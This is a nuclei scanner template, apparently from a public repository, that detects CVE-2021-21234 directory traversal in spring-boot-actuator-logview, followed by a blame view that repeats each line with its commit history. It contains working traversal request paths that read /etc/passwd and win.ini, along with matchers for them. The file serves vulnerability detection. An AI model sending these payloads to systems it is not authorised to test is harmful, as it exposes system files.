nuclei-templates/http/cves/2021/CVE-2021-21234.yaml

id: CVE-2021-21234

info:
  name: Spring Boot Actuator Logview Directory Traversal
  author: gy741,pikpikcu
  severity: high
  description: |
    spring-boot-actuator-logview before version 0.2.13 contains a directory traversal vulnerability in libraries that adds a simple logfile viewer as a spring boot actuator endpoint (maven package "eu.hinsch:spring-boot-actuator-logview".
  reference:
    - https://blogg.pwc.no/styringogkontroll/unauthenticated-directory-traversal-vulnerability-in-a-java-spring-boot-actuator-library-cve-2021-21234
    - https://github.com/cristianeph/vulnerability-actuator-log-viewer
    - https://nvd.nist.gov/vuln/detail/CVE-2021-21234
    - https://github.com/lukashinsch/spring-boot-actuator-logview/commit/760acbb939a8d1f7d1a7dfcd51ca848eea04e772
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
    cvss-score: 7.7
    cve-id: CVE-2021-21234
    cwe-id: CWE-22
    cpe: cpe:2.3:a:spring-boot-actuator-logview_project:spring-boot-actuator-logview:*:*:*:*:*:*:*:*
    epss-score: 0.97182
  tags: cve,cve2021,springboot,lfi,actuator
  metadata:
    max-request: 4

http:
  - method: GET
    path:
      - "{{BaseURL}}/manage/log/view?filename=/windows/win.ini&base=../../../../../../../../../../"  # Windows
      - "{{BaseURL}}/log/view?filename=/windows/win.ini&base=../../../../../../../../../../"  # Windows
      - "{{BaseURL}}/manage/log/view?filename=/etc/passwd&base=../../../../../../../../../../"  # linux
      - "{{BaseURL}}/log/view?filename=/etc/passwd&base=../../../../../../../../../../"  # linux

    stop-at-first-match: true
    matchers-condition: or
    matchers:
      - type: dsl
        dsl:
          - "regex('root:.*:0:0:', body)"
          - "status_code == 200"
        condition: and

      - type: dsl
        dsl:
          - "contains(body, 'bit app support')"
          - "contains(body, 'fonts')"
          - "contains(body, 'extensions')"
          - "status_code == 200"
        condition: and

# Enhanced by mp on 2022/04/01
Create CVE-2021-21234.yaml spring-boot-actuator-logview in a library that adds a simple logfile viewer as spring boot actuator endpoint. It is maven package "eu.hinsch:spring-boot-actuator-logview". In spring-boot-actuator-logview before version 0.2.13 there is a directory traversal vulnerability. The nature of this library is to expose a log file directory via admin (spring boot actuator) HTTP endpoints. Both the filename to view and a base folder (relative to the logging folder root) can be specified via request parameters. While the filename parameter was checked to prevent directory traversal exploits (so that `filename=../somefile` would not work), the base folder parameter was not sufficiently checked, so that `filename=somefile&base=../` could access a file outside the logging base directory). The vulnerability has been patched in release 0.2.13. Any users of 0.2.12 should be able to update without any issues as there are no other changes in that release. There is no workaround to fix the vulnerability other than updating or removing the dependency. However, removing read access of the user the application is run with to any directory not required for running the application can limit the impact. Additionally, access to the logview endpoint can be limited by deploying the application behind a reverse proxy. Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2021-06-24 05:36:45 +00:00			`id: CVE-2021-21234`

			`info:`
Dashboard Content Enhancements (#4031) Dashboard Content Enhancements 2022-04-07 13:53:15 +00:00			`name: Spring Boot Actuator Logview Directory Traversal`
Update CVE-2021-21234.yaml 2021-08-24 07:47:25 +00:00			`author: gy741,pikpikcu`
Create CVE-2021-21234.yaml spring-boot-actuator-logview in a library that adds a simple logfile viewer as spring boot actuator endpoint. It is maven package "eu.hinsch:spring-boot-actuator-logview". In spring-boot-actuator-logview before version 0.2.13 there is a directory traversal vulnerability. The nature of this library is to expose a log file directory via admin (spring boot actuator) HTTP endpoints. Both the filename to view and a base folder (relative to the logging folder root) can be specified via request parameters. While the filename parameter was checked to prevent directory traversal exploits (so that `filename=../somefile` would not work), the base folder parameter was not sufficiently checked, so that `filename=somefile&base=../` could access a file outside the logging base directory). The vulnerability has been patched in release 0.2.13. Any users of 0.2.12 should be able to update without any issues as there are no other changes in that release. There is no workaround to fix the vulnerability other than updating or removing the dependency. However, removing read access of the user the application is run with to any directory not required for running the application can limit the impact. Additionally, access to the logview endpoint can be limited by deploying the application behind a reverse proxy. Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2021-06-24 05:36:45 +00:00			`severity: high`
Dashboard Content Enhancements (#4031) Dashboard Content Enhancements 2022-04-07 13:53:15 +00:00			`description: \|`
			`spring-boot-actuator-logview before version 0.2.13 contains a directory traversal vulnerability in libraries that adds a simple logfile viewer as a spring boot actuator endpoint (maven package "eu.hinsch:spring-boot-actuator-logview".`
Update CVE-2021-21234.yaml 2021-08-24 09:49:47 +00:00			`reference:`
Update CVE-2021-21234.yaml 2021-08-24 07:47:25 +00:00			`- https://blogg.pwc.no/styringogkontroll/unauthenticated-directory-traversal-vulnerability-in-a-java-spring-boot-actuator-library-cve-2021-21234`
			`- https://github.com/cristianeph/vulnerability-actuator-log-viewer`
Update CVE-2021-21234.yaml 2021-08-24 08:46:14 +00:00			`- https://nvd.nist.gov/vuln/detail/CVE-2021-21234`
additional reference to cves templates (#4395) * additional reference to cves templates * Update CVE-2006-1681.yaml * Update CVE-2009-3318.yaml * Update CVE-2009-4223.yaml * Update CVE-2010-0942.yaml * Update CVE-2010-0944.yaml * Update CVE-2010-0972.yaml * Update CVE-2010-1304.yaml * Update CVE-2010-1308.yaml * Update CVE-2010-1313.yaml * Update CVE-2010-1461.yaml * Update CVE-2010-1470.yaml * Update CVE-2010-1471.yaml * Update CVE-2010-1472.yaml * Update CVE-2010-1474.yaml * removed duplicate references * misc fix Co-authored-by: Prince Chaddha <prince@projectdiscovery.io> Co-authored-by: Prince Chaddha <cyberbossprince@gmail.com> 2022-05-17 09:18:12 +00:00			`- https://github.com/lukashinsch/spring-boot-actuator-logview/commit/760acbb939a8d1f7d1a7dfcd51ca848eea04e772`
Added cve annotations + severity adjustments 2021-09-10 11:26:40 +00:00			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N`
refactor: Description field uniformization * info field reorder * reference values refactored to list * added new lines after the id and before the protocols * removed extra new lines * split really long descriptions to multiple lines (part 1) * other minor fixes 2022-04-22 10:38:41 +00:00			`cvss-score: 7.7`
Added cve annotations + severity adjustments 2021-09-10 11:26:40 +00:00			`cve-id: CVE-2021-21234`
			`cwe-id: CWE-22`
Added CPE and EPSS Score to CVE Templates 2023-04-12 10:55:48 +00:00			`cpe: cpe:2.3:a:spring-boot-actuator-logview_project:spring-boot-actuator-logview::::::::`
			`epss-score: 0.97182`
Dashboard Content Enhancements (#4031) Dashboard Content Enhancements 2022-04-07 13:53:15 +00:00			`tags: cve,cve2021,springboot,lfi,actuator`
Added max request counter of each template 2023-04-28 08:11:21 +00:00			`metadata:`
			`max-request: 4`
Create CVE-2021-21234.yaml spring-boot-actuator-logview in a library that adds a simple logfile viewer as spring boot actuator endpoint. It is maven package "eu.hinsch:spring-boot-actuator-logview". In spring-boot-actuator-logview before version 0.2.13 there is a directory traversal vulnerability. The nature of this library is to expose a log file directory via admin (spring boot actuator) HTTP endpoints. Both the filename to view and a base folder (relative to the logging folder root) can be specified via request parameters. While the filename parameter was checked to prevent directory traversal exploits (so that `filename=../somefile` would not work), the base folder parameter was not sufficiently checked, so that `filename=somefile&base=../` could access a file outside the logging base directory). The vulnerability has been patched in release 0.2.13. Any users of 0.2.12 should be able to update without any issues as there are no other changes in that release. There is no workaround to fix the vulnerability other than updating or removing the dependency. However, removing read access of the user the application is run with to any directory not required for running the application can limit the impact. Additionally, access to the logview endpoint can be limited by deploying the application behind a reverse proxy. Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2021-06-24 05:36:45 +00:00
Refactoring the directory structure based on protocols (#7137) * moving http templates * updated cves.json * moved network CVEs * updated scripts * updated workflows * updated requests to http * replaced network to tcp --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-04-27 04:28:59 +00:00			`http:`
Create CVE-2021-21234.yaml spring-boot-actuator-logview in a library that adds a simple logfile viewer as spring boot actuator endpoint. It is maven package "eu.hinsch:spring-boot-actuator-logview". In spring-boot-actuator-logview before version 0.2.13 there is a directory traversal vulnerability. The nature of this library is to expose a log file directory via admin (spring boot actuator) HTTP endpoints. Both the filename to view and a base folder (relative to the logging folder root) can be specified via request parameters. While the filename parameter was checked to prevent directory traversal exploits (so that `filename=../somefile` would not work), the base folder parameter was not sufficiently checked, so that `filename=somefile&base=../` could access a file outside the logging base directory). The vulnerability has been patched in release 0.2.13. Any users of 0.2.12 should be able to update without any issues as there are no other changes in that release. There is no workaround to fix the vulnerability other than updating or removing the dependency. However, removing read access of the user the application is run with to any directory not required for running the application can limit the impact. Additionally, access to the logview endpoint can be limited by deploying the application behind a reverse proxy. Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2021-06-24 05:36:45 +00:00			`- method: GET`
			`path:`
Dashboard Enhancements (#3722) * Enhancement: cves/2021/CVE-2021-1497.yaml by cs * Enhancement: cves/2010/CVE-2010-1957.yaml by mp * Enhancement: cves/2010/CVE-2010-1977.yaml by mp * Enhancement: cves/2010/CVE-2010-1979.yaml by mp * Enhancement: cves/2010/CVE-2010-1980.yaml by mp * Enhancement: cves/2010/CVE-2010-1981.yaml by mp * Enhancement: cves/2010/CVE-2010-1982.yaml by mp * Enhancement: cves/2010/CVE-2010-1983.yaml by mp * Enhancement: cves/2010/CVE-2010-2033.yaml by mp * Enhancement: cves/2010/CVE-2010-2034.yaml by mp * Enhancement: cves/2010/CVE-2010-2035.yaml by mp * Enhancement: cves/2010/CVE-2010-2036.yaml by mp * Enhancement: cves/2010/CVE-2010-2037.yaml by mp * Enhancement: cves/2010/CVE-2010-2045.yaml by mp * Enhancement: cves/2010/CVE-2010-2050.yaml by mp * Enhancement: cves/2010/CVE-2010-2122.yaml by mp * Enhancement: cves/2010/CVE-2010-1980.yaml by mp * Enhancement: cves/2010/CVE-2010-1981.yaml by mp * Enhancement: cves/2010/CVE-2010-1982.yaml by mp * Enhancement: cves/2010/CVE-2010-2035.yaml by mp * Enhancement: cves/2010/CVE-2010-2128.yaml by mp * Enhancement: cves/2010/CVE-2010-2259.yaml by mp * Enhancement: cves/2010/CVE-2010-2307.yaml by mp * Enhancement: cves/2010/CVE-2010-2507.yaml by mp * Enhancement: cves/2010/CVE-2010-2680.yaml by mp * Enhancement: cves/2010/CVE-2010-2682.yaml by mp * Enhancement: cves/2010/CVE-2010-2857.yaml by mp * Enhancement: cves/2010/CVE-2010-2861.yaml by mp * Enhancement: cves/2010/CVE-2010-2918.yaml by mp * Enhancement: cves/2010/CVE-2010-2920.yaml by mp * Enhancement: cves/2010/CVE-2010-3203.yaml by mp * Enhancement: cves/2010/CVE-2010-3426.yaml by mp * Enhancement: cves/2010/CVE-2010-4617.yaml by mp * Enhancement: cves/2010/CVE-2010-4231.yaml by mp * Enhancement: cves/2010/CVE-2010-4282.yaml by mp * Enhancement: cves/2010/CVE-2010-4282.yaml by mp * Enhancement: cves/2010/CVE-2010-4617.yaml by mp * Enhancement: cves/2010/CVE-2010-4719.yaml by mp * Enhancement: cves/2010/CVE-2010-4769.yaml by mp * Enhancement: cves/2010/CVE-2010-4977.yaml by mp * Enhancement: cves/2010/CVE-2010-5028.yaml by mp * Enhancement: cves/2010/CVE-2010-5278.yaml by mp * Enhancement: cves/2010/CVE-2010-5286.yaml by mp * Enhancement: cves/2011/CVE-2011-0049.yaml by mp * Enhancement: cves/2011/CVE-2011-1669.yaml by mp * Enhancement: cves/2011/CVE-2011-2744.yaml by mp * Enhancement: cves/2000/CVE-2000-0114.yaml by mp * Enhancement: cves/2011/CVE-2011-3315.yaml by mp * Enhancement: cves/2011/CVE-2011-4336.yaml by mp * Enhancement: cves/2011/CVE-2011-4618.yaml by mp * Enhancement: cves/2011/CVE-2011-4624.yaml by mp * Enhancement: cves/2011/CVE-2011-4804.yaml by mp * Enhancement: cves/2011/CVE-2011-0049.yaml by mp * Enhancement: cves/2011/CVE-2011-2780.yaml by mp * Enhancement: cves/2011/CVE-2011-2780.yaml by mp * Enhancement: cves/2012/CVE-2012-1823.yaml by mp * Enhancement: cves/2012/CVE-2012-0392.yaml by mp * Enhancement: cves/2012/CVE-2012-1226.yaml by mp * Enhancement: cves/2012/CVE-2012-0996.yaml by mp * Enhancement: cves/2021/CVE-2021-39226.yaml by cs * Enhancement: cves/2021/CVE-2021-27358.yaml by cs * Enhancement: cves/2021/CVE-2021-43798.yaml by cs * Enhancement: cves/2021/CVE-2021-43798.yaml by cs * Enhancement: cves/2021/CVE-2021-43798.yaml by cs * Enhancement: cves/2012/CVE-2012-1835.yaml by mp * Enhancement: cves/2012/CVE-2012-0901.yaml by mp * Enhancement: cves/2011/CVE-2011-5265.yaml by mp * Enhancement: cves/2011/CVE-2011-5181.yaml by mp * Enhancement: cves/2011/CVE-2011-5179.yaml by mp * Enhancement: cves/2011/CVE-2011-5107.yaml by mp * Enhancement: cves/2011/CVE-2011-5106.yaml by mp * Enhancement: cves/2011/CVE-2011-4926.yaml by mp * Enhancement: cves/2012/CVE-2012-0991.yaml by mp * Enhancement: cves/2012/CVE-2012-0981.yaml by mp * Enhancement: cves/2012/CVE-2012-0896.yaml by mp * Enhancement: cves/2012/CVE-2012-0392.yaml by mp * Enhancement: cves/2012/CVE-2012-0392.yaml by mp Fix "too few spaces before comment" lint errors Co-authored-by: sullo <sullo@cirt.net> 2022-02-21 18:33:16 +00:00			`- "{{BaseURL}}/manage/log/view?filename=/windows/win.ini&base=../../../../../../../../../../" # Windows`
			`- "{{BaseURL}}/log/view?filename=/windows/win.ini&base=../../../../../../../../../../" # Windows`
			`- "{{BaseURL}}/manage/log/view?filename=/etc/passwd&base=../../../../../../../../../../" # linux`
			`- "{{BaseURL}}/log/view?filename=/etc/passwd&base=../../../../../../../../../../" # linux`
Create CVE-2021-21234.yaml spring-boot-actuator-logview in a library that adds a simple logfile viewer as spring boot actuator endpoint. It is maven package "eu.hinsch:spring-boot-actuator-logview". In spring-boot-actuator-logview before version 0.2.13 there is a directory traversal vulnerability. The nature of this library is to expose a log file directory via admin (spring boot actuator) HTTP endpoints. Both the filename to view and a base folder (relative to the logging folder root) can be specified via request parameters. While the filename parameter was checked to prevent directory traversal exploits (so that `filename=../somefile` would not work), the base folder parameter was not sufficiently checked, so that `filename=somefile&base=../` could access a file outside the logging base directory). The vulnerability has been patched in release 0.2.13. Any users of 0.2.12 should be able to update without any issues as there are no other changes in that release. There is no workaround to fix the vulnerability other than updating or removing the dependency. However, removing read access of the user the application is run with to any directory not required for running the application can limit the impact. Additionally, access to the logview endpoint can be limited by deploying the application behind a reverse proxy. Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2021-06-24 05:36:45 +00:00
Request: Fix CVE-2021-21234 (#3920) * Fixed CVE-2019-9670 * more strict matchers * Fix CVE-2021-21234 * more strict matcher Co-authored-by: sandeep <sandeep@projectdiscovery.io> 2022-03-17 09:29:53 +00:00			`stop-at-first-match: true`
Update CVE-2021-21234.yaml 2021-08-24 08:46:14 +00:00			`matchers-condition: or`
Create CVE-2021-21234.yaml spring-boot-actuator-logview in a library that adds a simple logfile viewer as spring boot actuator endpoint. It is maven package "eu.hinsch:spring-boot-actuator-logview". In spring-boot-actuator-logview before version 0.2.13 there is a directory traversal vulnerability. The nature of this library is to expose a log file directory via admin (spring boot actuator) HTTP endpoints. Both the filename to view and a base folder (relative to the logging folder root) can be specified via request parameters. While the filename parameter was checked to prevent directory traversal exploits (so that `filename=../somefile` would not work), the base folder parameter was not sufficiently checked, so that `filename=somefile&base=../` could access a file outside the logging base directory). The vulnerability has been patched in release 0.2.13. Any users of 0.2.12 should be able to update without any issues as there are no other changes in that release. There is no workaround to fix the vulnerability other than updating or removing the dependency. However, removing read access of the user the application is run with to any directory not required for running the application can limit the impact. Additionally, access to the logview endpoint can be limited by deploying the application behind a reverse proxy. Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2021-06-24 05:36:45 +00:00			`matchers:`
Request: Fix CVE-2021-21234 (#3920) * Fixed CVE-2019-9670 * more strict matchers * Fix CVE-2021-21234 * more strict matcher Co-authored-by: sandeep <sandeep@projectdiscovery.io> 2022-03-17 09:29:53 +00:00			`- type: dsl`
			`dsl:`
Updated "/etc/passwd" regex to avoid possible false positive results. 2022-03-22 08:01:31 +00:00			`- "regex('root:.*:0:0:', body)"`
Request: Fix CVE-2021-21234 (#3920) * Fixed CVE-2019-9670 * more strict matchers * Fix CVE-2021-21234 * more strict matcher Co-authored-by: sandeep <sandeep@projectdiscovery.io> 2022-03-17 09:29:53 +00:00			`- "status_code == 200"`
Update CVE-2021-21234.yaml 2021-08-24 08:46:14 +00:00			`condition: and`
Request: Fix CVE-2021-21234 (#3920) * Fixed CVE-2019-9670 * more strict matchers * Fix CVE-2021-21234 * more strict matcher Co-authored-by: sandeep <sandeep@projectdiscovery.io> 2022-03-17 09:29:53 +00:00
			`- type: dsl`
			`dsl:`
			`- "contains(body, 'bit app support')"`
			`- "contains(body, 'fonts')"`
			`- "contains(body, 'extensions')"`
			`- "status_code == 200"`
Dashboard Content Enhancements (#4031) Dashboard Content Enhancements 2022-04-07 13:53:15 +00:00			`condition: and`

			`# Enhanced by mp on 2022/04/01`